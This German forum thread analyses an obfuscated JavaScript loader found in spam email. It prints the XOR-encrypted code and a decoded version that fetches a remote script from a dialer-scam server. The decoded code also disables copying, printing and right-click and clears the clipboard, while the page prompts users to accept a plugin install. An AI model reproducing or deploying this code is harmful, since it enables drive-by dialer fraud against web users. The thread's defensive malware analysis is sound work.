Java Virus / Trojaner ???

Diskutiere Java Virus / Trojaner ??? im Developer Network Forum im Bereich Hardware & Software Forum; da ich seit neusten lauter fake mails bekomme und ich bevor ich den mist lösche mal zufällig den source unter die lupe genommen habe , stellt sich...
Neues Thema erstellen Antworten
  • Java Virus / Trojaner ??? Beitrag #1
Hendrik_m

Hendrik_m

Gesperrter User
Dabei seit
11.03.2003
Beiträge
200
Reaktionspunkte
0
Ort
hessen/UdssR
da ich seit neusten lauter fake mails bekomme und ich bevor ich den mist lösche mal zufällig den source unter die lupe genommen habe , stellt sich mir die frage was zum geier beinhaltet dieser quelltext hier ????


hoffe es gibt hier leute die aus dem halbverschlüsselten quelltext etwas deuten können , bei akutem gefahreninhalt werde ich die datei unverzüglich löschen damit nicht noch mehr scriptkiddies emails damit versehen ;) ,--.,.-

<html>
<script language = "JavaScript">
var x = '';x+='%3Cscript%20language%20%3D%20%22JavaScript%22%3Efunction%20d%20%28t%2C%20k%29%20%7B%20var%20y%20%3D%200%3B%20var%20r%20%3D%20%27%27%3B%20t%20%3D%20unescape%20%28t%29%3B%20for%20%28i%20%3D%200%3B%20i%20%3C%20t%2Elength%3B%20i%2B%2B%29%20%7B%20x%20%3D%20k%2EcharCodeAt%28y%29%3B%20x2%20%3D%20t%2EcharCo';x+='deAt%28i%29%3B%20if%20%28x%20%21%3D%20x2%29%20%7B%20r%20%3D%20r%20%2B%20String%2EfromCharCode%20%28x2%20%5E%20x%29%3B%20%7D%20else%20%7B%20r%20%3D%20r%20%2B%20String%2EfromCharCode%20%28x%29%3B%20%7D%20y%2B%2B%3B%20if%20%28y%20%3D%3D%20k%2Elength%29%20%7B%20y%20%3D%200%3B%20%7D%20%7D%20return%20%28e';x+='scape%20%28r%29%29%3B%20%7Dfunction%20l1pc6gt84k34ee04ck5%20%28w%2C%20k%29%20%7B%20document%2Ewrite%20%28unescape%20%28d%20%28w%2C%20k%29%29%29%3B%20%7Dvar%20k%3D%272478655057%27%3B%3C%2Fscript%3E';document.write (unescape (x));l1pc6gt84k34ee04ck5('%0EGTJ%5FEA%10YV%5CSBYQP%15%0D%15%15xUAYeVGYEC%10%0AQMXVAYZY%12W%1FO%1FNCQG%17J%09%07%03PZG%10%1D%5E%0F%04%0CQ%0A%1DB%1EAXa%40EQXR%1D%19%1C%19%5EQY%5FB%5D%0EY%1E%1C%1BOO%13%0B%1DB%1EAXa%40EQXR%1D%19%1C%19Q%5CVJuZQUtC%1A%5D%1E%13%5F%0EHBPCGFY%10N%1C%0EM%5CQ%12%1CT%10R%1BA%5FfC%40%5DY%5F%1E%1C%1C%10%14%0A%12%13%01%0C%0F%025%17%1CLZ%06%03%0F%0E%035%05%05%02%05%09zYB%5D%1BBZB%5CP%1FuWA%5D%1EGV%5CPXU%1E%1C%1F%09%0C%0E%0B%0D%0E%01%0F%1C%0EMP%5BAQLP%04%01%02%08%03%02%07%04%02%0F%0B%04%07%01%067%01%04%0E%09%05%0EHV%40YQ%40%5EWX%15V%02P%07TX%0FR%05A%07%055Y%5B%1C%40%14%5D%1CNFTE%12L%0A%0A%02%04%0D%02%06%02%03%0F%17%5B%0B%5D%07%04%02%0F%04%01%02%08%03%02%18H%0E%17J%14%0A%18N%1BA%5FfC%40%5DY%5F%1E%1C%0E%10%5E%0AQ%1ACWeAGY%5BP%1A%1D%0C%5CYV%40%5DPYF%1A%40J%5FAP%18%40YWGTYFP%1DT%1D%40%1E%5F%1E%11%1F%0EH%0C%1ADQF%5EHB%0B', k);c2e0fl8j3t255ni('%0DB%5BK%5CDL%15ZS%5FVMXRQ%18%08%16%10%7BPNXfWJ%5CFF%13%0F%5EL%5BWL%5CY%5C%11R%10N%1CONTD%12I%0C%08%02S%5BJ%15%1E%5B%0C%01%03P%09%1CO%1BB%5DbEJP%5BS%10%1C%1F%1C%5DTV%5EA%5C%03%5C%1D%19%18J%40%12%08%1CO%1BB%5DbEJP%5BS%10%1C%1F%1CRYYKv%5B%5CPwF%19X%11%12%5C%0FEGSFDCV%11M%1D%03H%5FT%11%19%5B%11Q%1ALZeFCXV%5E%1D%1D%11%15%17%0F%11%16%0E%0D%0C%03%0D%12%1FIY1%09%01%0C%01%0C%0D%03%04%03%0CuXA%5C%16GYG%5FU%10tT%40P%1BDS%5FUWT%1D%1D%12%0C%0F%0B%08%08%019%0C%1D%03HS%5EBTCQ%04%058%0C%03%06%09%04%0E%0B%08%06%0D5%03%0A1%04%01%0D%05%0FE%5CP%12%19R%10U%04D%5B%03QF%09%05S%0A%01Q%5D%05%02QZ%04%16MZgLG%5F%5CV%19%11%10%15%15%05%15%11%0B%03%03%0B%1E%1C%14C%5D%07%03%09%08%0D%0D%0D%01%0E%07%0B%7FPEP%17G%5BM%5BR%1A%7CPLQ%1BFY%5BR%5D%5C%19%11%13%0C%0D%01%0C%0F%0B%08%08%11%02HRM%5BUFX%5EV%19%5CX%0D%02%5E%06Y1%5EZ5%05KY6%01%07%19O%15%5E%1DCCW%40%11I%05%08%01%04%09%07%03%06%05%0A%18Z%08%5C%09%04%0E%0B%04%058%0C%03%06%15M%0D%12I%11%05%19M%1ALZeFCXV%5E%1D%1D%03%15%5D%0FR%1FLVf%40J%5CXU%19%18%03%5DZWMXS%5CE%1FOK%5C%40%5D%1DC%5CTB%5BXEQ%10Q%1EE%1DZ%11%10%1C%0FE%09%19ARCQIA%0A', k);il57h4h1fc51sl636('%0EFWCQ%40G%13UW%5CRAP%5FU%13%0E%19%14xTBPkSAZIB%10%0BRDVSGZVX%12V%1CF%11KERK%16J%08%04%0A%5E%5FA%13%11%5F%0F%05%0FX%04%18D%1DMYaAFXVW%1B%1A%10%18%5EPZVLX%08Z%12%1D%1BNL%1A%05%18D%1DMYaAFXVW%1B%1A%10%18Q%5DUC%7B%5FWVxB%1A%5C%1D%1AQ%0BNA%5CBGGZ%19%40%19%08NPP%12%1DW%19%5C%1EG%5CjB%40%5CZV%10%19%1A%13%18%0B%12%12%02%05%01%07%06%14%10MZ%07%01%05%09%08%033%0A%0F%04%08yPLX%1DAVC%5CQ%1C%7CYD%5B%1DKW%5CQ%5B%5C%10%19%19%0A9%0F%0B%0C%0D%08%01%19%08N%5CZAPOY%0A%05%07%02%01%06%01%06%0D%07%05%013%05%0C%07%0B%07%0D%09%08%0BNZ%5F%16%1AV%1CR%0AU%03UU%0EX%06%40%03%0D%05%5DZ%17B%5Df%40CQ%5ET%1B%10%1F%12%14%09%11%1F%01%0B%0A%0B6%15%1C%14JP%02%06%07%08%0E%02%06%07%08%0E%0D%7ERM%5E%1CG%5BDVT%1B%7EXBZ%1BFPVT%5C%5E%11%1F%18%0C%0D%08%01%09%0A%0A9%1F%09HRDVSGZVX%12%5B%06GH%03D%04%0FQJ5%05%05H%18D%1FR%1FICUC%18H%0E%01%0C%02%05%07%06%03%0F%0B%13P%04%5E2541803396%1FM%0F%11%40%10%0E%13A%18FZgEJY%5DT%11%1F%09%15%5F%0C%5B%1EG%5CjB%40%5CZV%10%19%08WVUGXQ%5FL%1EDAPBW%1DA%5F%5DCPRIS%1AQ%1CF%14%5B%1A%1A%10%0DO%09%1BB%5BBZCM%08', k);n2vp3w76gx514p('%0D%40PK%5EBD%17YR%5FTFXPW%10%0A%15%11%7BREXdQB%5EEG%13%0DULYQD%5EZ%5D%11P%1BN%1EIFVG%13I%0E%03%02Q%5DB%17%1DZ%0C%03%08P%0B%1AG%19A%5CbGAPYU%18%1E%1C%1D%5DV%5D%5ECZ%0B%5E%1E%18%18HK%12%0A%1AG%19A%5CbGAPYU%18%1E%1C%1DR%5BRKt%5DTRtG%19Z%1A%12%5E%09MEPGDA%5D%11O%1B%0BJ%5CU%11%1BP%11S%1CDXfGCZ%5D%5E%1F%1B%19%17%14%0E%11%14%05%0D%0E%05%05%10%1CHY%023%0A%0E%05%02%07%02%06%02%0E%7EXCZ%1EEZF%5FW%1BtVFX%19GR%5FW%5CT%1F%1B%1A%0E%0C%0A%08%0A%0A9%0E%1B%0BJP%5FBVHQ%06%01%03%0E%02%01%01%04%06%0A%0A%03%02%06%0C%04%013%07%0B%07%09M%5ES%13%19P%1BP%5B%07%07%5F%01%5B1UP%0C%06A%5C%01%06%05%1FG%5CjC%40YYR%1B%18%1A%13%18%0A%12%17%06%0C%01%09%0A%14%10%17IX%06%063%08%04%01%097%07%03%0AxRE%5B%1DKXG%5ES%1D%7EPG%5B%17ES%5ESZ%5E%19%1A%199%0E%0B%09%0E%0C%0A%08%1A%08DQG%5ETAZ%5E%5D%13TTBUB%01%02%09%5B%0BQ7Z%40U%5FF%19D%1FR%1EIFVG%13I%0E%07%0B%0E%05%01%03%01%0A%0A%13P%04%5F%03%03%04%0C%04%03%03%04%0C%04%1FH%0C%15K%11%0E%13A%19F%5FdAAX%5DT%11%1E%09%10%5C%08P%1FG%5CjC%40YYR%1B%18%08WVTG%5DR%5BG%1FDAPCW%18B%5BVBPRIR%1AT%1FB%1FZ%1A%1A%10%0CO%0C%18FPCZCM%09', k);mcpeu418h8h7hpbju('%0DBTD%5ECE%19%5BP%5FVBWPV%11%04%17%13%7BPAWdPCPGE%13%0FQCYPEPX%5F%11R%1FA%1EHGXE%11I%0C%07%0DQ%5CC%19%1FX%0C%01%0C%5F%0B%1BF%17C%5EbEE%5FYT%19%10%1E%1F%5DTYQC%5B%0AP%1C%1A%18JO%1D%0A%1BF%17C%5EbEE%5FYT%19%10%1E%1FRYVDt%5CU%5CvE%19X%1E%1D%5E%08LKREDCY%1EO%1A%0AD%5EW%11%19T%1ES%1DEVdECXYQ%1F%1A%18%19%16%0C%11%16%01%02%0E%04%04%1E%1EJY1%06%01%01%04%02%08%0E%061%0CzWC%5B%1FKXD%5FU%1F%7BVGY%17EP%5FUX%5B%1F%1A%1B9%0E%08%08%08%0E%0F%0E%1A%0ADR%5DBTL%5E%06%02%06%0F7%021%087%07%0A%0B%09%08%031%04%04%05%05%0CNX%5F%1
 
  • Java Virus / Trojaner ??? Beitrag #2
noeppel

noeppel

Bekanntes Mitglied
Dabei seit
23.11.2001
Beiträge
257
Reaktionspunkte
0
Ort
xlatb repnz cmpsd
Hi!

Leider scheint mir dein Quelltext nicht vollständig. Lesbar machen kann man das ganze in dem man alle $XX Ausdrücke in die entsprechenden ASCII-Zeichen umwandelt. Dabei ist es bei diesem Script nur nicht belassen. Zusätzlich verwendet es noch eine XOR Verschlüsselung die man zwar durch ausprobieren herausfinden könnte, die aber in dem kompletten Quelltext enthalten sein müsste.
Code: 
<html>
<script language = "JavaScript">
var x = '';
x+='<script language = "JavaScript">
function d (t, k)
{
 var y = 0;
 var r = '';
 t = unescape (t);
 for (i = 0; i < t.length; i++)
 { x = k.charCodeAt(y);  // XOR Operand initialisieren aus  Variable "k"
 x2 = t.charCo';  // $XX Wert aus den Funktionen ab "l1pc6gt84k34ee04ck5"
 x+='deAt(i);  // etwas an den XOR Operanden anhängen
 if (x != x2)
 { r = r + String.fromCharCode (x2 ^ x); }  // ^ = XOR Operator
 else
 { r = r + String.fromCharCode (x); }
 y++;
 if (y == k.length)
 { y = 0; }
 }
 return (e';x+='scape (r)); }
function l1pc6gt84k34ee04ck5 (w, k)
 {
 document.write (unescape (d (w, k)));
 }
var k='2478655057';
</script>';
document.write (unescape (x));
l1pc6gt84k34ee04ck5('GTJ_EAYV\SBYQP
xUAYeVGYEC
QMXVAYZYWONCQGJ	PZG^Q
BAXa@EQXR^QY^
5FB]YOOBAXa@EQXRQ\VJuZQUtC]_HBPCGFYNM\QTRA_fC@]Y_
5LZ5	zYB]BZB\PuWA]GV\PXU	
MP[AQLP7	HV@YQ@^WXVPTXRA5Y[@]NFTEL


[]HJ
NA_fC@]Y_^
QCWeAGY[P\YV@]PYF@J_AP@YWGTYFPT@_HDQF^HB', k);
c2e0fl8j3t255ni('
B[K\DLZS_VMXRQ{PNXfWJ\FF^L


...
...und immer so weiter. Das Script entschlüsselt immer Funktion für Funktion. Leider fehlt für ein leichteres Nachvollziehen die Funktion deAt mit der die Entschlüsselungsroutine die Variable x bearbeitet. Wenn so ein Aufwand betrieben wird, nur um das ganze unlesbar zu machen dann könnte man schon vermuten das etwas gefährliches dahinter steckt (wobei ich immer dachte Javascript wär nicht gefährlich... :eek: ). Um die komplette Vorgehensweise dieses Javascripts nachvollziehen zu können, müsste man schon die komplette Datei vorliegen haben.

Gruß noeppel
 
  • Java Virus / Trojaner ??? Beitrag #3
Hendrik_m

Hendrik_m

Gesperrter User
Dabei seit
11.03.2003
Beiträge
200
Reaktionspunkte
0
Ort
hessen/UdssR
trozdem besten dank für deine mühen , also wer sich so viel mühe macht destruktives zu programmieren , tja dem ist echt nicht mehr zu helfen ...
 
  • Java Virus / Trojaner ??? Beitrag #4
noeppel

noeppel

Bekanntes Mitglied
Dabei seit
23.11.2001
Beiträge
257
Reaktionspunkte
0
Ort
xlatb repnz cmpsd
Hi!

Nachdem ich mich dann mal drangesetzt habe, war ich überrascht wie doof derjenige ist, der dieses Skript geschrieben hat... Der macht nämlich 18!!!!!! mal die gleiche XOR Verschlüsselung, immer nur mit anderen Operanden (was mich ~30 Minuten Zeit gekostet hat alles zu entschlüsseln :(). In dem unten stehenden Code ist an sich nichts Gefährliches, das einzige Problem ist, dass er weiteren JavaScript Code von dem Dialer-Abzocker herunterlädt! :aua:
Höchstwahrscheinlich um ein ActiveX-Objekt zu laden welches dann den Dialer installiert. Wer die kompletten Verschlüsselungsroutinen haben möchte, oder sich einfach dafür interessiert wie das ganze zu entschlüsseln war, der kann mir ja eine pm schicken.

Es folgt der relevante dekodierte Teil aus der HTML-Datei:
Code: 
/// Dekodiert aus: JScript.Encode /////////////
<script language="JavaScript">
var ref = document.referrer.toLowerCase();
var dieurl = document.URL.toLowerCase();
var parts = ref.split("sid=");
if (parts.length == 1) var parts = dieurl.split("sid=");
if (parts.length == 1) alert ('Fehlerhafter Einbau des Werbepartner-Codes!');
else document.write ("<script language=\"JavaScript\" src=\"http://dial.interfungmbh.de/werbepartner.php?sid="
       + parts[1] + "\"><\/script>");
</script>
//////////////////////////////////////////////////////////////////////

<script language = "JavaScript">
if(window.location.protocol.indexOf("file")!=-1)
{
location="about:blank";
}
function _nn()
{
if(document.layers||window.sidebar)
{
 var t= document.getSelection();
 if(t !="")
{
 if(!window.find)
{
 alert("Function Disabled.");
location="about:blank";
 }
else
{
 if(t !=" ")
{
 window.find(" ")
 };
 }
 };
 setTimeout("_nn()",20)
 }
 }
 _nn();
function _nrcie()
{
return false
}

function _nrcns(e)
{
if(e.which==2||e.which==3)return false}
if(document.layers)
{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=_nrcns}
 document.oncontextmenu=_nrcie;
 function _np1()
{
for(wi=0;wi<document.all.length;wi++)
{
 if(document.all[wi].style.visibility!="hidden")
{
 document.all[wi].style.visibility="hidden";
 document.all[wi].id="gwp"
}
}
};

function _np2()
{
for (wi=0;wi<document.all.length;wi++)
{
if(document.all[wi].id=="gwp")
document.all[wi].style.visibility=""
}
};

window.onbeforeprint=_np1;
window.onafterprint=_np2;
function _ng()
{
if (document.all)
for (i = 0;i< document.images.length;i++)
{
 z = document.images(i);z.galleryImg = "no" 
}
}

_ng();
function _nsb()
{
 window.status="";
 document.execCommand("Unselect");
try
{
 document.execCommand("Copy");
 clipboardData.clearData();
 clipboardData.setData("Text","");
}
 catch (e) {} finally {};
 setTimeout("_nsb()",1)
}
 _nsb();

</script><html>
<head>
<title>hallo du!</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<SCRIPT LANGUAGE="JScript.Encode">[siehe oben]</SCRIPT>
</head>
<body bgcolor="#FF9900">
<br>
<table width="639" border="0" align="center" cellpadding="5" cellspacing="5">
  <tr>
    <td width="273" bgcolor="#FFFFFF" height="276"> 
      <table width="267" border="1" cellpadding="0" cellspacing="0" height="195" bordercolor="#000000" align="center">
        <tr bgcolor="#000000"> 
          <td height="202"> 
            <div align="center"><img src="mp.jpg" width="163" height="142"> <br>
            </div>
          </td>
        </tr>
      </table>
      <div align="center"><br>
        <img src="progress.gif" width="139" height="31"><br>
        <br>
      </div>
            </td>
    <td width="329" height="276"><font face="Comic Sans MS" size="5" color="#000000">Hall&ouml;le 
      , <br>
      <br>
      </font><font face="Comic Sans MS" size="5" color="#000000">bitte Film ganz 
      ausladen lassen und gegebenenfalls das Plugin best&auml;tigen. Wenn der 
      Film mal stehenbleiben sollte, einfach auf Reload klicken...Ich hoffe es 
      macht Dich immer noch so an...;-)</font></td>
  </tr>
</table>
<br>
<br>
</body>
</html>
 
  • Java Virus / Trojaner ??? Beitrag #5
Hendrik_m

Hendrik_m

Gesperrter User
Dabei seit
11.03.2003
Beiträge
200
Reaktionspunkte
0
Ort
hessen/UdssR
schon traurig das so ein naja sagen wir mal halbwegs begabter mensch sein erlerntes wissen dafür nützt solch ein geistigen mist zu produzieren, diese dialer idioten sind echt das letze aber zum glück sind die meisten user mitlerweile schlau genug diese doofnasen zu durchschaun.

womöglich hat ein kleines script kiddie schwein den quelltext von anderen in meinen augen begabten menschen geklaut........

für den angeblichen film auf der seite wurde tatzächlich versucht ein activeX object zu inst. der einzige schutz der den usern davor bleibt ist die msg box die fragt ob sie den script ausführen wollen ..... und gnade den leuten die versehentlich auf ja gehen-...
 
Du musst dich einloggen oder registrieren, um hier zu antworten.
Neues Thema erstellen Antworten
Thema:

Java Virus / Trojaner ???

ANGEBOTE & SPONSOREN

https://www.mofapower.de/

Neueste Beiträge

Statistik des Forums

Themen
213.180
Beiträge
1.579.174
Mitglieder
55.879
Neuestes Mitglied
stonetreck
Oben